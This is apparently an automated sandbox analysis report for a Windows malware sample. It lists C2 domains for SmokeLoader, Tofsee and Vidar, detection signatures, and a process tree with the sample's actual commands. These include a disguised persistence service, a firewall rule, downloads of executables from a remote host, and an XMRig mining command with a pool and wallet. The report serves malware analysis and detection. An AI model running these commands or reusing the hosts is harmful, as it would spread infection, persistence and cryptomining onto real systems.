Overview

overview

10

Static

static

ceadfa0fa6...f7.exe

windows7_x64

10

ceadfa0fa6...f7.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    11/01/2022, 19:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ceadfa0fa600f20e010b22c24b4c13f7.exe

  • Size

    278KB

  • MD5

    ceadfa0fa600f20e010b22c24b4c13f7

  • SHA1

    c5da9c2d0e29ccf735cabc2f5686bd740214a020

  • SHA256

    c7a004cf4c602ab2981613f5c3c1f0874f3e9142c35ee277e0bdc643579e7acb

  • SHA512

    bf165c80b3116203021b08ba3b439502b3e912e65ef019159c1f9816f741025c4114a6e22755824856e6cb21db907cc1589bd78a4abe39e62690ec3c42c097b3

Score
10/10
arkeiloaderbotraccoonsmokeloadertofseevidarxmrig1125backdoorcollectiondiscoveryevasionloaderminerpersistencespywarestealersuricatatrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

raccoon

Version

1.8.4-hotfixs

rc4.plain

Extracted

Family

vidar

Version

49.6

Botnet

1125

C2

https://noc.social/@banda5ker

https://mastodon.social/@banda6ker
Attributes
  • profile_id

    1125

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 2 IoCs
    stealer
  • LoaderBot executable 1 IoCs
  • Vidar Stealer 2 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ceadfa0fa600f20e010b22c24b4c13f7.exe
    "C:\Users\Admin\AppData\Local\Temp\ceadfa0fa600f20e010b22c24b4c13f7.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Users\Admin\AppData\Local\Temp\ceadfa0fa600f20e010b22c24b4c13f7.exe
      "C:\Users\Admin\AppData\Local\Temp\ceadfa0fa600f20e010b22c24b4c13f7.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1312
  • C:\Users\Admin\AppData\Local\Temp\707F.exe
    C:\Users\Admin\AppData\Local\Temp\707F.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:908
  • C:\Users\Admin\AppData\Local\Temp\7C18.exe
    C:\Users\Admin\AppData\Local\Temp\7C18.exe
    1⤵
    • Executes dropped EXE
    PID:1640
  • C:\Users\Admin\AppData\Local\Temp\8AB9.exe
    C:\Users\Admin\AppData\Local\Temp\8AB9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xyqxllts\
      2⤵
        PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dwlqjlir.exe" C:\Windows\SysWOW64\xyqxllts\
        2⤵
          PID:1732
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create xyqxllts binPath= "C:\Windows\SysWOW64\xyqxllts\dwlqjlir.exe /d\"C:\Users\Admin\AppData\Local\Temp\8AB9.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1536
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description xyqxllts "wifi internet conection"
            2⤵
              PID:1892
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start xyqxllts
              2⤵
                PID:1996
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1512
              • C:\Users\Admin\AppData\Local\Temp\98FC.exe
                C:\Users\Admin\AppData\Local\Temp\98FC.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:804
                • C:\Users\Admin\AppData\Local\Temp\98FC.exe
                  C:\Users\Admin\AppData\Local\Temp\98FC.exe
                  2⤵
                  • Executes dropped EXE
                  PID:960
                • C:\Users\Admin\AppData\Local\Temp\98FC.exe
                  C:\Users\Admin\AppData\Local\Temp\98FC.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1048
              • C:\Windows\SysWOW64\xyqxllts\dwlqjlir.exe
                C:\Windows\SysWOW64\xyqxllts\dwlqjlir.exe /d"C:\Users\Admin\AppData\Local\Temp\8AB9.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1628
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1992
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1288
              • C:\Users\Admin\AppData\Local\Temp\324.exe
                C:\Users\Admin\AppData\Local\Temp\324.exe
                1⤵
                • Executes dropped EXE
                PID:1648
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 436
                  2⤵
                  • Loads dropped DLL
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2036
              • C:\Users\Admin\AppData\Local\Temp\42E7.exe
                C:\Users\Admin\AppData\Local\Temp\42E7.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1740
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1132
              • C:\Users\Admin\AppData\Local\Temp\470D.exe
                C:\Users\Admin\AppData\Local\Temp\470D.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:868
              • C:\Users\Admin\AppData\Local\Temp\4F29.exe
                C:\Users\Admin\AppData\Local\Temp\4F29.exe
                1⤵
                • Executes dropped EXE
                PID:1988
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\50F0.bat C:\Users\Admin\AppData\Local\Temp\4F29.exe"
                  2⤵
                    PID:616
                    • C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1460
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6398\123.vbs"
                      3⤵
                      • Blocklisted process makes network request
                      PID:1448
                    • C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:524
                    • C:\Users\Admin\AppData\Local\Temp\6398\setup_c.exe
                      setup_c.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:840
                    • C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1700
                    • C:\Users\Admin\AppData\Local\Temp\6398\setup_m.exe
                      setup_m.exe
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1884
                    • C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1468
                    • C:\Users\Admin\AppData\Local\Temp\6398\setup_s.exe
                      setup_s.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1684
                    • C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\50EE.tmp\50EF.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1592
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                  • Accesses Microsoft Outlook profiles
                  • outlook_office_path
                  • outlook_win_path
                  PID:1288
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1556
                  • C:\Users\Admin\AppData\Local\Temp\5A8F.exe
                    C:\Users\Admin\AppData\Local\Temp\5A8F.exe
                    1⤵
                    • Executes dropped EXE
                    PID:1452
                  • C:\Users\Admin\AppData\Local\Temp\69CC.exe
                    C:\Users\Admin\AppData\Local\Temp\69CC.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Modifies system certificate store
                    PID:1568

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/616-168-0x000007FEFC2D1000-0x000007FEFC2D3000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/804-79-0x0000000000360000-0x0000000000361000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/804-69-0x00000000009B0000-0x0000000000A3A000-memory.dmp

                    Filesize

                    552KB

                    Download

                  • memory/804-78-0x0000000004E10000-0x0000000004E11000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/804-70-0x00000000009B0000-0x0000000000A3A000-memory.dmp

                    Filesize

                    552KB

                    Download

                  • memory/868-146-0x00000000772B0000-0x000000007740C000-memory.dmp

                    Filesize

                    1.4MB

                    Download

                  • memory/868-148-0x0000000001290000-0x00000000013B6000-memory.dmp

                    Filesize

                    1.1MB

                    Download

                  • memory/868-160-0x0000000074A40000-0x0000000074AC0000-memory.dmp

                    Filesize

                    512KB

                    Download

                  • memory/868-150-0x0000000076A60000-0x0000000076AEF000-memory.dmp

                    Filesize

                    572KB

                    Download

                  • memory/868-173-0x0000000004C60000-0x0000000004C61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/868-140-0x0000000000780000-0x00000000007C5000-memory.dmp

                    Filesize

                    276KB

                    Download

                  • memory/868-149-0x0000000001290000-0x00000000013B6000-memory.dmp

                    Filesize

                    1.1MB

                    Download

                  • memory/868-144-0x0000000076900000-0x0000000076957000-memory.dmp

                    Filesize

                    348KB

                    Download

                  • memory/868-143-0x00000000777B0000-0x00000000777F7000-memory.dmp

                    Filesize

                    284KB

                    Download

                  • memory/868-137-0x0000000000080000-0x0000000000081000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/868-139-0x0000000076470000-0x000000007651C000-memory.dmp

                    Filesize

                    688KB

                    Download

                  • memory/868-133-0x0000000075500000-0x000000007554A000-memory.dmp

                    Filesize

                    296KB

                    Download

                  • memory/868-134-0x0000000001290000-0x00000000013B6000-memory.dmp

                    Filesize

                    1.1MB

                    Download

                  • memory/908-75-0x0000000000220000-0x0000000000229000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/908-76-0x0000000000230000-0x0000000000239000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/908-77-0x0000000000400000-0x0000000000452000-memory.dmp

                    Filesize

                    328KB

                    Download

                  • memory/1048-96-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-102-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-93-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-94-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-105-0x00000000049C0000-0x00000000049C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1048-101-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-95-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1048-97-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-120-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-126-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-127-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-135-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-136-0x0000000000400000-0x0000000000420000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/1132-141-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1288-184-0x00000000000F0000-0x0000000000164000-memory.dmp

                    Filesize

                    464KB

                    Download

                  • memory/1288-185-0x0000000000080000-0x00000000000EB000-memory.dmp

                    Filesize

                    428KB

                    Download

                  • memory/1288-167-0x000000006D151000-0x000000006D153000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/1312-56-0x0000000000400000-0x0000000000409000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/1312-58-0x0000000075801000-0x0000000075803000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/1348-88-0x0000000000400000-0x0000000000451000-memory.dmp

                    Filesize

                    324KB

                    Download

                  • memory/1348-86-0x0000000000220000-0x000000000022D000-memory.dmp

                    Filesize

                    52KB

                    Download

                  • memory/1348-87-0x0000000000230000-0x0000000000243000-memory.dmp

                    Filesize

                    76KB

                    Download

                  • memory/1384-81-0x0000000003E80000-0x0000000003E96000-memory.dmp

                    Filesize

                    88KB

                    Download

                  • memory/1384-59-0x0000000002650000-0x0000000002666000-memory.dmp

                    Filesize

                    88KB

                    Download

                  • memory/1452-193-0x0000000000330000-0x0000000000390000-memory.dmp

                    Filesize

                    384KB

                    Download

                  • memory/1556-55-0x0000000000230000-0x0000000000239000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/1556-182-0x0000000000070000-0x0000000000077000-memory.dmp

                    Filesize

                    28KB

                    Download

                  • memory/1556-183-0x0000000000060000-0x000000000006C000-memory.dmp

                    Filesize

                    48KB

                    Download

                  • memory/1556-54-0x0000000000220000-0x0000000000228000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/1568-228-0x0000000000400000-0x00000000005A8000-memory.dmp

                    Filesize

                    1.7MB

                    Download

                  • memory/1568-227-0x0000000000400000-0x00000000005A8000-memory.dmp

                    Filesize

                    1.7MB

                    Download

                  • memory/1568-229-0x0000000000240000-0x0000000000285000-memory.dmp

                    Filesize

                    276KB

                    Download

                  • memory/1568-230-0x0000000000400000-0x00000000005A8000-memory.dmp

                    Filesize

                    1.7MB

                    Download

                  • memory/1628-116-0x0000000000400000-0x0000000000451000-memory.dmp

                    Filesize

                    324KB

                    Download

                  • memory/1640-72-0x0000000000240000-0x000000000025C000-memory.dmp

                    Filesize

                    112KB

                    Download

                  • memory/1640-71-0x0000000000220000-0x0000000000231000-memory.dmp

                    Filesize

                    68KB

                    Download

                  • memory/1640-73-0x0000000000400000-0x0000000000455000-memory.dmp

                    Filesize

                    340KB

                    Download

                  • memory/1648-155-0x0000000000400000-0x0000000002BC5000-memory.dmp

                    Filesize

                    39.8MB

                    Download

                  • memory/1648-153-0x0000000004390000-0x0000000004421000-memory.dmp

                    Filesize

                    580KB

                    Download

                  • memory/1648-152-0x0000000004320000-0x000000000436F000-memory.dmp

                    Filesize

                    316KB

                    Download

                  • memory/1684-240-0x00000000777B0000-0x00000000777F7000-memory.dmp

                    Filesize

                    284KB

                    Download

                  • memory/1684-239-0x0000000076470000-0x000000007651C000-memory.dmp

                    Filesize

                    688KB

                    Download

                  • memory/1684-236-0x0000000000570000-0x00000000005B5000-memory.dmp

                    Filesize

                    276KB

                    Download

                  • memory/1684-235-0x0000000000100000-0x0000000000101000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1684-233-0x0000000075500000-0x000000007554A000-memory.dmp

                    Filesize

                    296KB

                    Download

                  • memory/1684-234-0x0000000000110000-0x000000000056B000-memory.dmp

                    Filesize

                    4.4MB

                    Download

                  • memory/1884-205-0x00000000002C0000-0x0000000000322000-memory.dmp

                    Filesize

                    392KB

                    Download

                  • memory/1884-206-0x00000000002C0000-0x0000000000322000-memory.dmp

                    Filesize

                    392KB

                    Download

                  • memory/1884-209-0x00000000003E0000-0x0000000000425000-memory.dmp

                    Filesize

                    276KB

                    Download

                  • memory/1884-208-0x0000000074A40000-0x0000000074AC0000-memory.dmp

                    Filesize

                    512KB

                    Download

                  • memory/1884-207-0x0000000076A60000-0x0000000076AEF000-memory.dmp

                    Filesize

                    572KB

                    Download

                  • memory/1884-200-0x0000000076470000-0x000000007651C000-memory.dmp

                    Filesize

                    688KB

                    Download

                  • memory/1884-201-0x00000000777B0000-0x00000000777F7000-memory.dmp

                    Filesize

                    284KB

                    Download

                  • memory/1884-204-0x00000000772B0000-0x000000007740C000-memory.dmp

                    Filesize

                    1.4MB

                    Download

                  • memory/1884-198-0x00000000002C0000-0x0000000000322000-memory.dmp

                    Filesize

                    392KB

                    Download

                  • memory/1884-253-0x0000000002750000-0x0000000002751000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1884-202-0x0000000076900000-0x0000000076957000-memory.dmp

                    Filesize

                    348KB

                    Download

                  • memory/1884-195-0x0000000075500000-0x000000007554A000-memory.dmp

                    Filesize

                    296KB

                    Download

                  • memory/1884-197-0x0000000000330000-0x0000000000331000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1992-112-0x0000000000080000-0x0000000000095000-memory.dmp

                    Filesize

                    84KB

                    Download

                  • memory/1992-113-0x0000000000080000-0x0000000000095000-memory.dmp

                    Filesize

                    84KB

                    Download

                  • memory/2036-263-0x0000000000300000-0x0000000000301000-memory.dmp

                    Filesize

                    4KB

                    Download